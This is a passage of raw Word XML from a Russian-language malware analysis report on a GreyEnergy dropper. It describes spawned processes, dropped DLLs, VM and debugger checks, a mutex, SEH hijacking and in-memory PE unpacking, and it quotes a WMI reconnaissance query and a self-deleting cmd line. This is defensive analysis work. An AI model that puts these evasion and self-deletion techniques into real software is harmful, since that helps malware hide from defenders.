        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Simonzh</w:t>
      </w:r>
      <w:r w:rsidRPr="00345FEC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Также указан адрес точки входа в секции </w:t>
      </w:r>
      <w:r w:rsidRPr="00C95241">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95241">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Но при открытии в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDAPro</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95241">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>можно увидеть импорты функций для загрузки ВПО.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1147A972" w14:textId="33B231D0" w:rsidR="00C95241" w:rsidRDefault="000A5AC0" w:rsidP="00C95241">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Файл порождает множество процессов, </w:t>
      </w:r>
      <w:r w:rsidR="00CC19CF">
        <w:t>претворяющихся</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> легитимными процессами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reg</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5AC0">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5AC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5AC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для изменения ключей реестра и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5AC0">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5AC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для создания новых процессов (см. рисунок 21)</w:t>
      </w:r>
      <w:r w:rsidR="00EF6811">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B14BAA7" w14:textId="77777777" w:rsidR="000A5AC0" w:rsidRDefault="000A5AC0" w:rsidP="000A5AC0">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:keepNext/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r w:rsidRPr="000A5AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74788764" wp14:editId="7B394420">
            <wp:extent cx="5289550" cy="19560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19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6468" w14:textId="11C24931" w:rsidR="000A5AC0" w:rsidRDefault="000A5AC0" w:rsidP="000A5AC0">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A5AC0">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="000A5AC0">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000A5AC0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A5AC0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21</w:t>
      </w:r>
      <w:r w:rsidRPr="000A5AC0">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000A5AC0">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Создаваемые процессы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A788235" w14:textId="3CE5963C" w:rsidR="00EF6811" w:rsidRDefault="00EF6811" w:rsidP="00EF6811">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В результате процессов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">создается вредоносный файл во временной директории – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DBCO</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. рисунок 22).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487806E6" w14:textId="77777777" w:rsidR="00EF6811" w:rsidRDefault="00EF6811" w:rsidP="00EF6811">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67AE2A23" wp14:editId="5F01B629">
            <wp:extent cx="4146550" cy="33024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3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45FA" w14:textId="7F7F6E46" w:rsidR="00EF6811" w:rsidRPr="00EF6811" w:rsidRDefault="00EF6811" w:rsidP="00EF6811">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EF681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EF6811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22</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Основное ВПО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C06934" w14:textId="77777777" w:rsidR="00EF6811" w:rsidRPr="00EF6811" w:rsidRDefault="00EF6811" w:rsidP="00EF6811"/>
    <w:p w14:paraId="6E08F3BC" w14:textId="4E667729" w:rsidR="00C95241" w:rsidRDefault="00EF6811" w:rsidP="00C95241">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Также с помощью запросов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>выполняется проверка на виртуальную машину</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF634F0" w14:textId="0A429E06" w:rsidR="00EF6811" w:rsidRDefault="00EF6811" w:rsidP="00EF6811">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="851"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&lt;Input Sample.exe" issued a query "Select * from Win32_Service where PathName Like '%svchost%' and State = 'Stopped' and StartMode = 'Disabled' and ServiceType = 'Share Process'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B514C9" w14:textId="7F4F3B19" w:rsidR="00EF6811" w:rsidRDefault="00EF6811" w:rsidP="00EF6811">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Аналогично предыдущему файлу этот самоудаляется после запуска</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9B1D81" w14:textId="464C4F4F" w:rsidR="00EF6811" w:rsidRPr="00EF6811" w:rsidRDefault="00EF6811" w:rsidP="00EF6811">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="851"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process "cmd.exe" with commandline "/c timeout 2 &gt; nul &amp; del /F /Q "C:\\GreyEnergyDropper.bin.exe""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07797370" w14:textId="00911782" w:rsidR="00EF6811" w:rsidRPr="00345FEC" w:rsidRDefault="00EF6811" w:rsidP="00EF6811">
      <w:r>
        <w:t>Общее</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>поведение</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>файла</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>можно</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>описать</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>следующим</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>образом</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>он п</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve">роверяет </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t>/дебаггер (</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RDTSCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve"> инструкция — тайминг-атака на виртуализацию), дропает 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve"> в %</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TEMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t>% (</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RCXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t>893.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t>0.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve">), перемещает одну в </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve">32 как </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>crkxko</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve">, настраивает службу </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RemoteAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t xml:space="preserve"> для автозагрузки, удаляет себя. Использует</w:t>
      </w:r>
      <w:r w:rsidRPr="00345FEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00345FEC">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Win</w:t>
      </w:r>
      <w:r w:rsidRPr="00345FEC">
        <w:t>32_</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00345FEC">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="00345FEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t>разведки</w:t>
      </w:r>
      <w:r w:rsidRPr="00345FEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6811">
        <w:t>служб</w:t>
      </w:r>
      <w:r w:rsidRPr="00345FEC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593F93AB" w14:textId="1BDC50C2" w:rsidR="00EF6811" w:rsidRDefault="00EF6811" w:rsidP="00EF6811">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidR="00DE7CE6">
        <w:t>нтересным моментом является мьютекс для проверки на уникальность экземпляра</w:t>
      </w:r>
      <w:r w:rsidR="00542BBC" w:rsidRPr="00542BBC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00542BBC">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00542BBC" w:rsidRPr="00542BBC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00542BBC">
        <w:t xml:space="preserve">файл будет запущен лишь единожды. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E12E456" w14:textId="6596AC2D" w:rsidR="00542BBC" w:rsidRDefault="00542BBC" w:rsidP="00EF6811">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Далее откроем файл в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDAPro</w:t>
      </w:r>
      <w:r w:rsidRPr="00542BBC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для статического анализа.</w:t>
      </w:r>
      <w:r w:rsidR="00C4539A">
        <w:t xml:space="preserve"> Были найдены следующие функции</w:t>
      </w:r>
      <w:r w:rsidR="00C4539A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60581B61" w14:textId="76AB78AE" w:rsidR="00C4539A" w:rsidRDefault="00C4539A" w:rsidP="00C4539A">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C4539A">
        <w:t>Генерирует псевдослучайное значение (</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4539A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>seed</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4539A">
        <w:t xml:space="preserve"> или ключ) на основе уникальной системной информации (время, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C4539A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4539A">
        <w:t xml:space="preserve"> процесса/потока, тики, счётчик). </w:t>
      </w:r>
      <w:r w:rsidRPr="00C4539A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XOR</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4539A">
        <w:t xml:space="preserve"> и условия делают его "уникал</w:t>
      </w:r>
      <w:r>
        <w:t>ьным" для каждой машины/запуска</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4539A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4539A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">здесь создается ключ для мьютекса, что обеспечивает одноразовый запуск и проверку на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4539A">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidR="00E9452C">
        <w:t>ам были бы другие тики). Псевдокод функции представлен</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на рисунке 23.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AAB1B9" w14:textId="77777777" w:rsidR="00C4539A" w:rsidRDefault="00C4539A" w:rsidP="00C4539A">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:keepNext/>
        <w:ind w:left="1211" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C4539A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="061574F0" wp14:editId="034ED832">
            <wp:extent cx="4383222" cy="29565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3222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DF02" w14:textId="11270D82" w:rsidR="00C4539A" w:rsidRDefault="00C4539A" w:rsidP="00C4539A">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C4539A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00C4539A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C4539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4539A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23</w:t>
      </w:r>
      <w:r w:rsidRPr="00C4539A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C4539A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.  Псевдокод функции для генерации ключа мьютекса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223E0048" w14:textId="77777777" w:rsidR="004A3DA9" w:rsidRPr="004A3DA9" w:rsidRDefault="004A3DA9" w:rsidP="004A3DA9"/>
    <w:p w14:paraId="59EBB9B0" w14:textId="75835792" w:rsidR="00D12BC6" w:rsidRDefault="00D12BC6" w:rsidP="00D12BC6">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Настройка</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12BC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SEH</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12BC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12BC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XOR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12BC6">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">обфускацией. Теперь файл может перехватывать обработку исключений (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>breakpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12BC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>при дебаге). Псевдокод приведен на рисунке 24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC36CA8" w14:textId="77777777" w:rsidR="00D12BC6" w:rsidRPr="00D12BC6" w:rsidRDefault="00D12BC6" w:rsidP="00D12BC6">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="1211" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7C6420" w14:textId="77777777" w:rsidR="00D12BC6" w:rsidRDefault="00D12BC6" w:rsidP="00D12BC6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D12BC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="495C8DC8" wp14:editId="18F072D2">
            <wp:extent cx="4905374" cy="246505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15E3" w14:textId="606A273C" w:rsidR="00C4539A" w:rsidRDefault="00D12BC6" w:rsidP="00D12BC6">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12BC6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12BC6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D12BC6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D12BC6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24</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12BC6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D12BC6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Функция захвата обработки исключений</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6370239A" w14:textId="77777777" w:rsidR="004A3DA9" w:rsidRPr="004A3DA9" w:rsidRDefault="004A3DA9" w:rsidP="004A3DA9"/>
    <w:p w14:paraId="20C14C8D" w14:textId="365C3710" w:rsidR="00D12BC6" w:rsidRDefault="00D12BC6" w:rsidP="00115699">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Основная функция загрузки исполняемого файла.</w:t>
      </w:r>
      <w:r w:rsidR="00115699">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00115699" w:rsidRPr="00115699">
        <w:t>Распаковывает зашифрованный PE</w:t>
      </w:r>
      <w:r w:rsidR="00115699">
        <w:t>: дешифрует (перестановка из таблицы</w:t>
      </w:r>
      <w:r w:rsidR="00115699" w:rsidRPr="00115699">
        <w:t xml:space="preserve"> + ROL/XOR), аллоцирует память, копирует секции, фиксит релокации, разрешает имп</w:t>
      </w:r>
      <w:r w:rsidR="00E9452C">
        <w:t>орты динамически, патчит PEB</w:t>
      </w:r>
      <w:r w:rsidR="00115699" w:rsidRPr="00115699">
        <w:t xml:space="preserve"> для скрытой инъекции модуля в процесс (без DLL-injec</w:t>
      </w:r>
      <w:r w:rsidR="00115699">
        <w:t>tion). Затем прыгает на распакованный</w:t>
      </w:r>
      <w:r w:rsidR="00115699" w:rsidRPr="00115699">
        <w:t xml:space="preserve"> код (дроппер).</w:t>
      </w:r>
      <w:r w:rsidR="00115699">
        <w:t xml:space="preserve"> Основная часть псевдокода приведена на рисунках 25 и 26.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D3427A" w14:textId="77777777" w:rsidR="00115699" w:rsidRDefault="00115699" w:rsidP="00115699">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="851" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00115699">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54EBF0C4" wp14:editId="704DD8A3">
